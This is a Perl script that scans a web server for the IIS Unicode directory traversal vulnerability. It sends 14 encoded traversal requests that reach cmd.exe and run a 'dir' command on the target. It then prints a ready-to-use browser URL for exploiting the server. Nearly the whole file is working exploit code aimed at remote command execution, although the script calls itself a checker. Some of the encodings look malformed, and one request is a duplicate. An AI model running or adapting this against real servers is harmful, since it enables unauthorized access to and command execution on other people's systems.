#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS unicode vulnerability 
# in 14 different ways. Also gives you the browser URL for the 
# exploit. Origionally Stealthmode316, modifications by Roeland
#
# 
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK

Example: ./uni.pl www.target.com:80\n";}

#($host,$port)=split(/:/,@ARGV[0]);
($host = @ARGV[0]);
$port = 80;

$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 2
my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 3
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 4
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 5
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 6
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 7
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 8
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 9
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 10
my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 11
my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 12
my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 13
my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 14
my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n
");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir\n";}}

if ($flag!=1) {
	print "$host: Not vulnerable\n";
	exit;
}

sub sendraw {

	$hbn = gethostbyname($host);

	if ($hbn) {
	        my ($pstr)=@_;
	        socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems\n");
	
	        if(connect(S,pack "SnA4x8",2,$port,$target)) {
        	        my @in;
               		select(S);      
			$|=1;   
			print $pstr;
                
			while(<S>){ 
				push @in, $_;
			}
                
			select(STDOUT); 
			close(S); 
			return @in;
        	} else {
			print "$host: Can't connect\n";
			exit;
		}
	} else {
		print "$host: Host not found\n";
		exit;
	}
}